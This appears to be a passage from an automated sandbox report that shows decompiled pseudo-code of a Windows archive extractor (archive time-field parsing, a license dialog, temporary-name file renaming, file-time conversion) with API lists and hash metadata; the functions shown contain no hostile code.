                                                                            												}
                                                                            												_t180 =  *(_t344 + 0x13);
                                                                            												_t265 = _t180 & 0x00000008;
                                                                            												__eflags = _t265;
                                                                            												 *(_t344 + 0x17) = _t265;
                                                                            												if(_t265 != 0) {
                                                                            													__eflags =  *(_t344 + 0x14);
                                                                            													_t272 = _t318;
                                                                            													if(__eflags == 0) {
                                                                            														E001A0A64(_t240 + 0x1050, _t315, E0019C2E0(_t272, __eflags), _t315);
                                                                            													} else {
                                                                            														E001A0A25(_t240 + 0x1050, _t315, E0019C29E(_t272), 0);
                                                                            													}
                                                                            													_t180 =  *(_t344 + 0x13);
                                                                            												}
                                                                            												__eflags =  *(_t344 + 0x14);
                                                                            												if( *(_t344 + 0x14) != 0) {
                                                                            													__eflags = _t180 & 0x00000010;
                                                                            													if((_t180 & 0x00000010) != 0) {
                                                                            														__eflags =  *(_t344 + 0x15);
                                                                            														if( *(_t344 + 0x15) == 0) {
                                                                            															_t341 = 0x3fffffff;
                                                                            															_t328 = 0x3b9aca00;
                                                                            														} else {
                                                                            															_t187 = E0019C29E(_t318);
                                                                            															_t341 = 0x3fffffff;
                                                                            															_t328 = 0x3b9aca00;
                                                                            															_t188 = _t187 & 0x3fffffff;
                                                                            															__eflags = _t188 - 0x3b9aca00;
                                                                            															if(_t188 < 0x3b9aca00) {
                                                                            																E001A06D0(_t240 + 0x1040, _t188, 0);
                                                                            															}
                                                                            														}
                                                                            														__eflags =  *(_t344 + 0x16);
                                                                            														if( *(_t344 + 0x16) != 0) {
                                                                            															_t185 = E0019C29E(_t318) & _t341;
                                                                            															__eflags = _t185 - _t328;
                                                                            															if(_t185 < _t328) {
                                                                            																E001A06D0(_t240 + 0x1048, _t185, 0);
                                                                            															}
                                                                            														}
                                                                            														__eflags =  *(_t344 + 0x17);
                                                                            														if( *(_t344 + 0x17) != 0) {
                                                                            															_t182 = E0019C29E(_t318) & _t341;
                                                                            															__eflags = _t182 - _t328;
                                                                            															if(_t182 < _t328) {
                                                                            																E001A06D0(_t240 + 0x1050, _t182, 0);
                                                                            															}
                                                                            														}
                                                                            													}
                                                                            												}
                                                                            												goto L102;
                                                                            											}
                                                                            											__eflags = _t340 - 5;
                                                                            											if(_t340 < 5) {
                                                                            												goto L102;
                                                                            											}
                                                                            											goto L65;
                                                                            										}
                                                                            										_t329 = _t327 - 1;
                                                                            										if(_t329 == 0) {
                                                                            											__eflags = _t246;
                                                                            											if(__eflags < 0) {
                                                                            												goto L102;
                                                                            											}
                                                                            											if(__eflags > 0) {
                                                                            												L60:
                                                                            												E0019C39E(_t315);
                                                                            												__eflags = E0019C39E(_t315);
                                                                            												if(__eflags != 0) {
                                                                            													 *((char*)(_t240 + 0x10f3)) = 1;
                                                                            													E00193E41(_t344 + 0x38, 0x14, L";%u", _t203);
                                                                            													_t344 = _t344 + 0x10;
                                                                            													E0019FA89(__eflags, _t240 + 0x28, _t344 + 0x30, 0x800);
                                                                            												}
                                                                            												goto L102;
                                                                            											}
                                                                            											__eflags = _t340 - 1;
                                                                            											if(_t340 < 1) {
                                                                            												goto L102;
                                                                            											}
                                                                            											goto L60;
                                                                            										}
                                                                            										_t330 = _t329 - 1;
                                                                            										if(_t330 == 0) {
                                                                            											 *((intOrPtr*)(_t240 + 0x1100)) = E0019C39E(_t315);
                                                                            											 *(_t240 + 0x2104) = E0019C39E(_t315) & 0x00000001;
                                                                            											_t331 = E0019C39E(_t315);
                                                                            											 *((char*)(_t344 + 0xc0)) = 0;
                                                                            											__eflags = _t331 - 0x1fff;
                                                                            											if(_t331 < 0x1fff) {
                                                                            												E0019C300(_t318, _t344 + 0xc4, _t331);
                                                                            												 *((char*)(_t344 + _t331 + 0xc0)) = 0;
                                                                            											}
                                                                            											E0019B9DE(_t344 + 0xc4, _t344 + 0xc4, 0x2000);
                                                                            											_push(0x800);
                                                                            											_push(_t240 + 0x1104);
                                                                            											_push(_t344 + 0xc8);
                                                                            											E001A1094();
                                                                            											goto L102;
                                                                            										}
                                                                            										_t332 = _t330 - 1;
                                                                            										if(_t332 == 0) {
                                                                            											_t220 = E0019C39E(_t315);
                                                                            											 *(_t344 + 0x1c) = _t220;
                                                                            											_t342 = _t240 + 0x2108;
                                                                            											 *(_t240 + 0x2106) = _t220 >> 0x00000002 & 0x00000001;
                                                                            											 *(_t240 + 0x2107) = _t220 >> 0x00000003 & 0x00000001;
                                                                            											 *((char*)(_t240 + 0x2208)) = 0;
                                                                            											 *_t342 = 0;
                                                                            											__eflags = _t220 & 0x00000001;
                                                                            											if((_t220 & 0x00000001) != 0) {
                                                                            												_t334 = E0019C39E(_t315);
                                                                            												__eflags = _t334 - 0xff;
                                                                            												if(_t334 >= 0xff) {
                                                                            													_t334 = 0xff;
                                                                            												}
                                                                            												E0019C300(_t318, _t342, _t334);
                                                                            												_t220 =  *(_t344 + 0x1c);
                                                                            												 *((char*)(_t334 + _t342)) = 0;
                                                                            											}
                                                                            											__eflags = _t220 & 0x00000002;
                                                                            											if((_t220 & 0x00000002) != 0) {
                                                                            												_t333 = E0019C39E(_t315);
                                                                            												__eflags = _t333 - 0xff;
                                                                            												if(_t333 >= 0xff) {
                                                                            													_t333 = 0xff;
                                                                            												}
                                                                            												_t343 = _t240 + 0x2208;
                                                                            												E0019C300(_t318, _t343, _t333);
                                                                            												 *((char*)(_t333 + _t343)) = 0;
                                                                            											}
                                                                            											__eflags =  *(_t240 + 0x2106);
                                                                            											if( *(_t240 + 0x2106) != 0) {
                                                                            												 *((intOrPtr*)(_t240 + 0x2308)) = E0019C39E(_t315);
                                                                            											}
                                                                            											__eflags =  *(_t240 + 0x2107);
                                                                            											if( *(_t240 + 0x2107) != 0) {
                                                                            												 *((intOrPtr*)(_t240 + 0x230c)) = E0019C39E(_t315);
                                                                            											}
                                                                            											 *((char*)(_t240 + 0x2105)) = 1;
                                                                            											goto L102;
                                                                            										}
                                                                            										if(_t332 != 1) {
                                                                            											goto L102;
                                                                            										}
                                                                            										if( *((intOrPtr*)(_t240 + 4)) == 3 &&  *((intOrPtr*)(_t318 + 0x18)) -  *(_t344 + 0x28) == 1) {
                                                                            											_t340 = _t340 + 1;
                                                                            										}
                                                                            										_t336 = _t240 + 0x1028;
                                                                            										E00191EDE(_t336, _t340);
                                                                            										_push(_t340);
                                                                            										_push( *_t336);
                                                                            										goto L40;
                                                                            									}
                                                                            								} else {
                                                                            									L102:
                                                                            									_t247 =  *(_t344 + 0x28);
                                                                            									 *(_t318 + 0x1c) = _t247;
                                                                            									_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t247;
                                                                            									if(_t135 >= 2) {
                                                                            										continue;
                                                                            									}
                                                                            									break;
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            			}





























































                                                                            0x00192596
                                                                            0x0019259a
                                                                            0x001925a2
                                                                            0x001925a2
                                                                            0x001925b2
                                                                            0x001925c2
                                                                            0x001925c7
                                                                            0x001925ce
                                                                            0x001925d6
                                                                            0x001925df
                                                                            0x001925ed
                                                                            0x001925f7
                                                                            0x00192604
                                                                            0x0019260d
                                                                            0x00192613
                                                                            0x00192624
                                                                            0x00192629
                                                                            0x0019262e
                                                                            0x00192632
                                                                            0x00192636
                                                                            0x0019263c
                                                                            0x00192646
                                                                            0x0019264b
                                                                            0x0019264e
                                                                            0x00192650
                                                                            0x00192652
                                                                            0x00192652
                                                                            0x00192650
                                                                            0x0019263c
                                                                            0x00192658
                                                                            0x0019265f
                                                                            0x00192669
                                                                            0x00192523
                                                                            0x00192530
                                                                            0x00192535
                                                                            0x00192539
                                                                            0x0019253d
                                                                            0x00192545
                                                                            0x00192545
                                                                            0x00000000
                                                                            0x00192521
                                                                            0x00192171
                                                                            0x00192174
                                                                            0x001924f3
                                                                            0x001924f8
                                                                            0x001924fa
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00192500
                                                                            0x00192508
                                                                            0x00192512
                                                                            0x001921c9
                                                                            0x001921cb
                                                                            0x00000000
                                                                            0x001921cb
                                                                            0x0019217a
                                                                            0x0019217d
                                                                            0x00192374
                                                                            0x00192376
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019237c
                                                                            0x00192387
                                                                            0x00192389
                                                                            0x0019238e
                                                                            0x00192392
                                                                            0x00192394
                                                                            0x0019239a
                                                                            0x0019239e
                                                                            0x0019239e
                                                                            0x001923a1
                                                                            0x001923a5
                                                                            0x001923a7
                                                                            0x001923a9
                                                                            0x001923ab
                                                                            0x001923cf
                                                                            0x001923ad
                                                                            0x001923bb
                                                                            0x001923bb
                                                                            0x001923d4
                                                                            0x001923d8
                                                                            0x001923d8
                                                                            0x001923dc
                                                                            0x001923dc
                                                                            0x001923df
                                                                            0x001923e3
                                                                            0x001923e5
                                                                            0x001923e7
                                                                            0x001923e9
                                                                            0x0019240d
                                                                            0x001923eb
                                                                            0x001923f9
                                                                            0x001923f9
                                                                            0x001923e9
                                                                            0x00192412
                                                                            0x00192418
                                                                            0x00192418
                                                                            0x0019241b
                                                                            0x0019241f
                                                                            0x00192421
                                                                            0x00192426
                                                                            0x00192428
                                                                            0x0019244c
                                                                            0x0019242a
                                                                            0x00192438
                                                                            0x00192438
                                                                            0x00192451
                                                                            0x00192451
                                                                            0x00192455
                                                                            0x0019245a
                                                                            0x00192460
                                                                            0x00192462
                                                                            0x00192468
                                                                            0x0019246d
                                                                            0x00192496
                                                                            0x0019249b
                                                                            0x0019246f
                                                                            0x00192471
                                                                            0x00192476
                                                                            0x0019247b
                                                                            0x00192480
                                                                            0x00192482
                                                                            0x00192484
                                                                            0x0019248f
                                                                            0x0019248f
                                                                            0x00192484
                                                                            0x001924a0
                                                                            0x001924a5
                                                                            0x001924ae
                                                                            0x001924b0
                                                                            0x001924b2
                                                                            0x001924bd
                                                                            0x001924bd
                                                                            0x001924b2
                                                                            0x001924c2
                                                                            0x001924c7
                                                                            0x001924d4
                                                                            0x001924d6
                                                                            0x001924d8
                                                                            0x001924e7
                                                                            0x001924e7
                                                                            0x001924d8
                                                                            0x001924c7
                                                                            0x00192462
                                                                            0x00000000
                                                                            0x0019245a
                                                                            0x0019237e
                                                                            0x00192381
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00192381
                                                                            0x00192183
                                                                            0x00192186
                                                                            0x00192317
                                                                            0x00192319
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019231f
                                                                            0x0019232a
                                                                            0x0019232c
                                                                            0x00192338
                                                                            0x0019233a
                                                                            0x0019234a
                                                                            0x00192354
                                                                            0x00192359
                                                                            0x0019236a
                                                                            0x0019236a
                                                                            0x00000000
                                                                            0x0019233a
                                                                            0x00192321
                                                                            0x00192324
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00192324
                                                                            0x0019218c
                                                                            0x0019218f
                                                                            0x001922a2
                                                                            0x001922b1
                                                                            0x001922bc
                                                                            0x001922be
                                                                            0x001922c6
                                                                            0x001922cc
                                                                            0x001922d9
                                                                            0x001922de
                                                                            0x001922de
                                                                            0x001922f4
                                                                            0x001922f9
                                                                            0x00192304
                                                                            0x0019230c
                                                                            0x0019230d
                                                                            0x00000000
                                                                            0x0019230d
                                                                            0x00192195
                                                                            0x00192198
                                                                            0x001921d7
                                                                            0x001921de
                                                                            0x001921e5
                                                                            0x001921ee
                                                                            0x001921fc
                                                                            0x00192202
                                                                            0x00192209
                                                                            0x0019220d
                                                                            0x0019220f
                                                                            0x00192218
                                                                            0x0019221f
                                                                            0x00192221
                                                                            0x00192223
                                                                            0x00192223
                                                                            0x00192229
                                                                            0x0019222e
                                                                            0x00192232
                                                                            0x00192232
                                                                            0x00192236
                                                                            0x00192238
                                                                            0x00192241
                                                                            0x00192248
                                                                            0x0019224a
                                                                            0x0019224c
                                                                            0x0019224c
                                                                            0x0019224f
                                                                            0x00192258
                                                                            0x0019225d
                                                                            0x0019225d
                                                                            0x00192261
                                                                            0x00192268
                                                                            0x00192271
                                                                            0x00192271
                                                                            0x00192277
                                                                            0x0019227e
                                                                            0x00192287
                                                                            0x00192287
                                                                            0x0019228d
                                                                            0x00000000
                                                                            0x0019228d
                                                                            0x0019219d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001921a7
                                                                            0x001921b5
                                                                            0x001921b5
                                                                            0x001921b8
                                                                            0x001921c1
                                                                            0x001921c6
                                                                            0x001921c7
                                                                            0x00000000
                                                                            0x001921c7
                                                                            0x00192670
                                                                            0x00192670
                                                                            0x00192670
                                                                            0x00192674
                                                                            0x0019267a
                                                                            0x0019267f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019267f
                                                                            0x00192149
                                                                            0x001920a9
                                                                            0x0019207a
                                                                            0x00192687

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ;%u$x%u$xc%u
                                                                            • API String ID: 0-2277559157
                                                                            • Opcode ID: aaa12f36ca797bcac1f1cb068ba24652aa0c9a16f15eaf8aab724aab174ef260
                                                                            • Instruction ID: 12228bb0c35e74af4418396f734f32fbacf65735df37e30daaa160ba0c776dee
                                                                            • Opcode Fuzzy Hash: aaa12f36ca797bcac1f1cb068ba24652aa0c9a16f15eaf8aab724aab174ef260
                                                                            • Instruction Fuzzy Hash: 46F12471604340ABDF25EF248895BFE77E9AFA4300F084579FD858B287DB749948C7A2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 73%
                                                                            			E001AA3E1(void* __ecx, void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
                                                                            				long _t9;
                                                                            				long _t10;
                                                                            				WCHAR* _t11;
                                                                            				void* _t25;
                                                                            				signed short _t28;
                                                                            				intOrPtr _t31;
                                                                            				struct HWND__* _t35;
                                                                            				intOrPtr _t36;
                                                                            				void* _t37;
                                                                            				struct HWND__* _t38;
                                                                            
                                                                            				_t28 = _a12;
                                                                            				_t36 = _a8;
                                                                            				_t35 = _a4;
                                                                            				if(E001912D7(__edx, _t35, _t36, _t28, _a16, L"LICENSEDLG", 0, 0) != 0) {
                                                                            					L16:
                                                                            					__eflags = 1;
                                                                            					return 1;
                                                                            				}
                                                                            				_t37 = _t36 - 0x110;
                                                                            				if(_t37 == 0) {
                                                                            					E001AC343(__edx, __eflags, __fp0, _t35);
                                                                            					_t9 =  *0x1db704;
                                                                            					__eflags = _t9;
                                                                            					if(_t9 != 0) {
                                                                            						SendMessageW(_t35, 0x80, 1, _t9);
                                                                            					}
                                                                            					_t10 =  *0x1e5d04;
                                                                            					__eflags = _t10;
                                                                            					if(_t10 != 0) {
                                                                            						SendDlgItemMessageW(_t35, 0x66, 0x172, 0, _t10);
                                                                            					}
                                                                            					_t11 =  *0x1ede1c;
                                                                            					__eflags = _t11;
                                                                            					if(__eflags != 0) {
                                                                            						SetWindowTextW(_t35, _t11);
                                                                            					}
                                                                            					_t38 = GetDlgItem(_t35, 0x65);
                                                                            					SendMessageW(_t38, 0x435, 0, 0x10000);
                                                                            					SendMessageW(_t38, 0x443, 0,  *0x1cdf40(0xf));
                                                                            					 *0x1cdf3c(_t35);
                                                                            					_t31 =  *0x1d75ec; // 0x0
                                                                            					E001A8FE6(_t31, __eflags,  *0x1d0064, _t38,  *0x1ede18, 0, 0);
                                                                            					L001B2B4E( *0x1ede1c);
                                                                            					L001B2B4E( *0x1ede18);
                                                                            					goto L16;
                                                                            				}
                                                                            				if(_t37 != 1) {
                                                                            					L5:
                                                                            					return 0;
                                                                            				}
                                                                            				_t25 = (_t28 & 0x0000ffff) - 1;
                                                                            				if(_t25 == 0) {
                                                                            					_push(1);
                                                                            					L7:
                                                                            					EndDialog(_t35, ??);
                                                                            					goto L16;
                                                                            				}
                                                                            				if(_t25 == 1) {
                                                                            					_push(0);
                                                                            					goto L7;
                                                                            				}
                                                                            				goto L5;
                                                                            			}














                                                                            APIs
                                                                              • Part of subcall function 001912D7: GetDlgItem.USER32(00000000,00003021), ref: 0019131B
                                                                              • Part of subcall function 001912D7: SetWindowTextW.USER32(00000000,001C22E4), ref: 00191331
                                                                            • EndDialog.USER32(?,00000001), ref: 001AA431
                                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 001AA45E
                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 001AA473
                                                                            • SetWindowTextW.USER32(?,?), ref: 001AA484
                                                                            • GetDlgItem.USER32(?,00000065), ref: 001AA48D
                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 001AA4A1
                                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 001AA4B3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: MessageSend$Item$TextWindow$Dialog
                                                                            • String ID: LICENSEDLG
                                                                            • API String ID: 3214253823-2177901306
                                                                            • Opcode ID: d9ef8a3b4b1ffda6f856c231e8a99e854de580e9f75f6b6e991f770ee9f0247d
                                                                            • Instruction ID: 936096a83d83f9532e7d126e8998e279206dd0d6ceed0467661a13073918e4c2
                                                                            • Opcode Fuzzy Hash: d9ef8a3b4b1ffda6f856c231e8a99e854de580e9f75f6b6e991f770ee9f0247d
                                                                            • Instruction Fuzzy Hash: 4921BF362442147BE2115B75ED8DF7B7BACEF5BB84F454018F601AA4A0CBA29C82D672
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 80%
                                                                            			E00199268(void* __ecx) {
                                                                            				void* _t31;
                                                                            				short _t32;
                                                                            				long _t34;
                                                                            				void* _t39;
                                                                            				short _t41;
                                                                            				void* _t65;
                                                                            				intOrPtr _t68;
                                                                            				void* _t76;
                                                                            				intOrPtr _t79;
                                                                            				void* _t82;
                                                                            				WCHAR* _t83;
                                                                            				void* _t85;
                                                                            				void* _t87;
                                                                            
                                                                            				E001AD870(E001C1336, _t85);
                                                                            				E001AD940();
                                                                            				_t83 =  *(_t85 + 8);
                                                                            				_t31 = _t85 - 0x4030;
                                                                            				__imp__GetLongPathNameW(_t83, _t31, 0x800, _t76, _t82, _t65);
                                                                            				if(_t31 == 0 || _t31 >= 0x800) {
                                                                            					L20:
                                                                            					_t32 = 0;
                                                                            					__eflags = 0;
                                                                            				} else {
                                                                            					_t34 = GetShortPathNameW(_t83, _t85 - 0x5030, 0x800);
                                                                            					if(_t34 == 0) {
                                                                            						goto L20;
                                                                            					} else {
                                                                            						_t92 = _t34 - 0x800;
                                                                            						if(_t34 >= 0x800) {
                                                                            							goto L20;
                                                                            						} else {
                                                                            							 *(_t85 + 8) = E0019B943(_t92, _t85 - 0x4030);
                                                                            							_t78 = E0019B943(_t92, _t85 - 0x5030);
                                                                            							_t68 = 0;
                                                                            							if( *_t38 == 0) {
                                                                            								goto L20;
                                                                            							} else {
                                                                            								_t39 = E001A1410( *(_t85 + 8), _t78);
                                                                            								_t94 = _t39;
                                                                            								if(_t39 == 0) {
                                                                            									goto L20;
                                                                            								} else {
                                                                            									_t41 = E001A1410(E0019B943(_t94, _t83), _t78);
                                                                            									if(_t41 != 0) {
                                                                            										goto L20;
                                                                            									} else {
                                                                            										 *(_t85 - 0x100c) = _t41;
                                                                            										_t79 = 0;
                                                                            										while(1) {
                                                                            											_t96 = _t41;
                                                                            											if(_t41 != 0) {
                                                                            												break;
                                                                            											}
                                                                            											E0019FAB1(_t85 - 0x100c, _t83, 0x800);
                                                                            											E00193E41(E0019B943(_t96, _t85 - 0x100c), 0x800, L"rtmp%d", _t79);
                                                                            											_t87 = _t87 + 0x10;
                                                                            											if(E00199E6B(_t85 - 0x100c) == 0) {
                                                                            												_t41 =  *(_t85 - 0x100c);
                                                                            											} else {
                                                                            												_t41 = 0;
                                                                            												 *(_t85 - 0x100c) = 0;
                                                                            											}
                                                                            											_t79 = _t79 + 0x7b;
                                                                            											if(_t79 < 0x2710) {
                                                                            												continue;
                                                                            											} else {
                                                                            												_t99 = _t41;
                                                                            												if(_t41 == 0) {
                                                                            													goto L20;
                                                                            												} else {
                                                                            													break;
                                                                            												}
                                                                            											}
                                                                            											goto L21;
                                                                            										}
                                                                            										E0019FAB1(_t85 - 0x3030, _t83, 0x800);
                                                                            										_push(0x800);
                                                                            										E0019B9B9(_t99, _t85 - 0x3030,  *(_t85 + 8));
                                                                            										if(MoveFileW(_t85 - 0x3030, _t85 - 0x100c) == 0) {
                                                                            											goto L20;
                                                                            										} else {
                                                                            											E0019943C(_t85 - 0x2030);
                                                                            											 *((intOrPtr*)(_t85 - 4)) = _t68;
                                                                            											if(E00199E6B(_t83) == 0) {
                                                                            												_push(0x12);
                                                                            												_push(_t83);
                                                                            												_t68 = E00199528(_t85 - 0x2030);
                                                                            											}
                                                                            											MoveFileW(_t85 - 0x100c, _t85 - 0x3030);
                                                                            											if(_t68 != 0) {
                                                                            												E001994DA(_t85 - 0x2030);
                                                                            												E00199621(_t85 - 0x2030);
                                                                            											}
                                                                            											E0019946E(_t85 - 0x2030);
                                                                            											_t32 = 1;
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				L21:
                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t85 - 0xc));
                                                                            				return _t32;
                                                                            			}
















                                                                            0x00199439

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 0019926D
                                                                            • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00199290
                                                                            • GetShortPathNameW.KERNEL32 ref: 001992AF
                                                                              • Part of subcall function 001A1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0019ACFE,?,?,?,0019ACAD,?,-00000002,?,00000000,?), ref: 001A1426
                                                                            • _swprintf.LIBCMT ref: 0019934B
                                                                              • Part of subcall function 00193E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00193E54
                                                                            • MoveFileW.KERNEL32(?,?), ref: 001993C0
                                                                            • MoveFileW.KERNEL32(?,?), ref: 001993FC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                                                            • String ID: rtmp%d
                                                                            • API String ID: 2111052971-3303766350
                                                                            • Opcode ID: 0dbf4d3c9e8c31c96df90a96bc067c149ce636ca83ec6df44383396f63a0ecb6
                                                                            • Instruction ID: 10f213514793de2961d7c2403249a7c77e3c26cfa01b36e835ddca15879ba72b
                                                                            • Opcode Fuzzy Hash: 0dbf4d3c9e8c31c96df90a96bc067c149ce636ca83ec6df44383396f63a0ecb6
                                                                            • Instruction Fuzzy Hash: FB41BF76911218A6DF21EBA8CE84FEE737CBF65781F0044E9B504E3042EB349B85CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 89%
                                                                            			E001A06E0(intOrPtr* __ecx, intOrPtr __edx, void* __eflags, signed int* _a4) {
                                                                            				struct _SYSTEMTIME _v16;
                                                                            				struct _SYSTEMTIME _v32;
                                                                            				struct _SYSTEMTIME _v48;
                                                                            				struct _FILETIME _v56;
                                                                            				struct _FILETIME _v64;
                                                                            				struct _FILETIME _v72;
                                                                            				intOrPtr _v76;
                                                                            				intOrPtr _v80;
                                                                            				signed int _t73;
                                                                            				void* _t81;
                                                                            				signed int _t85;
                                                                            				void* _t86;
                                                                            				intOrPtr _t87;
                                                                            				intOrPtr* _t89;
                                                                            				intOrPtr* _t90;
                                                                            				signed int* _t92;
                                                                            				signed int _t94;
                                                                            
                                                                            				_t87 = __edx;
                                                                            				_t90 = __ecx;
                                                                            				_v80 = E001ADEE0( *__ecx,  *((intOrPtr*)(__ecx + 4)), 0x64, 0);
                                                                            				_v76 = _t87;
                                                                            				if(E0019A995() >= 0x600) {
                                                                            					FileTimeToSystemTime( &_v64,  &_v32);
                                                                            					SystemTimeToTzSpecificLocalTime(0,  &_v32,  &_v16);
                                                                            					SystemTimeToFileTime( &_v16,  &_v72);
                                                                            					SystemTimeToFileTime( &_v32,  &_v56);
                                                                            					asm("sbb ecx, [esp+0x24]");
                                                                            					asm("sbb ecx, ebp");
                                                                            					asm("adc ecx, ebp");
                                                                            					_v72.dwLowDateTime = 0 - _v56.dwLowDateTime + _v72.dwLowDateTime + _v64.dwLowDateTime;
                                                                            					asm("adc ecx, ebp");
                                                                            					_v72.dwHighDateTime = _v72.dwHighDateTime + _v64.dwHighDateTime;
                                                                            				} else {
                                                                            					FileTimeToLocalFileTime( &_v64,  &_v72);
                                                                            				}
                                                                            				FileTimeToSystemTime( &_v72,  &_v48);
                                                                            				_t92 = _a4;
                                                                            				_t81 = 1;
                                                                            				_t85 = _v48.wDay & 0x0000ffff;
                                                                            				_t94 = _v48.wMonth & 0x0000ffff;
                                                                            				_t88 = _v48.wYear & 0x0000ffff;
                                                                            				_t92[3] = _v48.wHour & 0x0000ffff;
                                                                            				_t92[4] = _v48.wMinute & 0x0000ffff;
                                                                            				_t92[5] = _v48.wSecond & 0x0000ffff;
                                                                            				_t92[7] = _v48.wDayOfWeek & 0x0000ffff;
                                                                            				 *_t92 = _v48.wYear & 0x0000ffff;
                                                                            				_t92[1] = _t94;
                                                                            				_t92[2] = _t85;
                                                                            				_t92[8] = _t85 - 1;
                                                                            				if(_t94 > 1) {
                                                                            					_t89 = 0x1cd084;
                                                                            					_t86 = 4;
                                                                            					while(_t86 <= 0x30) {
                                                                            						_t86 = _t86 + 4;
                                                                            						_t92[8] = _t92[8] +  *_t89;
                                                                            						_t89 = _t89 + 4;
                                                                            						_t81 = _t81 + 1;
                                                                            						if(_t81 < _t94) {
                                                                            							continue;
                                                                            						}
                                                                            						break;
                                                                            					}
                                                                            					_t88 = _v48.wYear & 0x0000ffff;
                                                                            				}
                                                                            				if(_t94 > 2 && E001A0849(_t88) != 0) {
                                                                            					_t92[8] = _t92[8] + 1;
                                                                            				}
                                                                            				_t73 = E001ADF50( *_t90,  *((intOrPtr*)(_t90 + 4)), 0x3b9aca00, 0);
                                                                            				_t92[6] = _t73;
                                                                            				return _t73;
                                                                            			}

                                                                            APIs
                                                                            • __aulldiv.LIBCMT ref: 001A06F3
                                                                              • Part of subcall function 0019A995: GetVersionExW.KERNEL32(?), ref: 0019A9BA
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 001A071C
                                                                            • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 001A072E
                                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 001A073B
                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 001A0751
                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 001A075D
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 001A0793
                                                                            • __aullrem.LIBCMT ref: 001A081D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                            • String ID:
                                                                            • API String ID: 1247370737-0
